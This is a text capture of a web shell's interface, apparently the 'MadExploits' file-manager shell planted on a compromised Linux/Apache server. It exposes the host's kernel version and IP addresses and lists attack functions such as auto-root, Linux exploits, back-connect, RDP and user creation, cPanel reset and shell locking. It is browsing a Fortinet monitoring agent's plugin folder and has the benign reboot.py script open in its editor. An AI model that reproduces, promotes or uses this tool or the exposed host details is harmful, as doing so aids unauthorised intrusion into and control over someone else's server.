Linux ip-148-66-134-25.ip.secureserver.net 3.10.0-1160.119.1.el7.tuxcare.els10.x86_64 #1 SMP Fri Oct 11 21:40:41 UTC 2024 x86_64
Apache
: 148.66.134.25 | : 3.145.61.199
66 Domain
8.0.30
amvm
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
lib /
fm-agent /
countermeasures /
plugins /
[ HOME SHELL ]
Name
Size
Permission
Action
CountermeasureLogHelper.py
2.29
KB
-rw-r--r--
CountermeasurePlugin.py
3.5
KB
-rw-r--r--
CountermeasureScriptHelper.py
2.28
KB
-rw-r--r--
ServiceRestartHelper.py
4.5
KB
-rw-r--r--
__init__.py
592
B
-rw-r--r--
disk_cm.py
657
B
-rw-r--r--
dmesg.py
626
B
-rw-r--r--
netstat.py
638
B
-rw-r--r--
reboot.py
844
B
-rw-r--r--
sample.py
1.88
KB
-rw-r--r--
top.py
800
B
-rw-r--r--
users_cm.py
649
B
-rw-r--r--
vmstat.py
601
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : reboot.py
""" FortiMonitor Reboot Countermeasure Copyright 2023 Fortinet, Inc. All Rights Reserved. fm-ops@fortinet.com """ from CountermeasurePlugin import CountermeasurePlugin class RebootCountermeasure(CountermeasurePlugin): name = "Reboot Server" textkey = "reboot" description = "Reboot the server" wall_announce_delay = 30 max_frequency = 1800 max_runtime = None sudo_requirements = ["shutdown"] author = "support@panopta.com" def run(self): """ Issue a "shutdown -r" command, with an 15 second sleep to give us time report the result back to Panopta before the reboot happens. """ return_code, output = self.execute("sleep 15; sudo -n shutdown -r", block=False) self.save_text_output("Server reboot initiated") self.save_return_code(c.return_code)
Close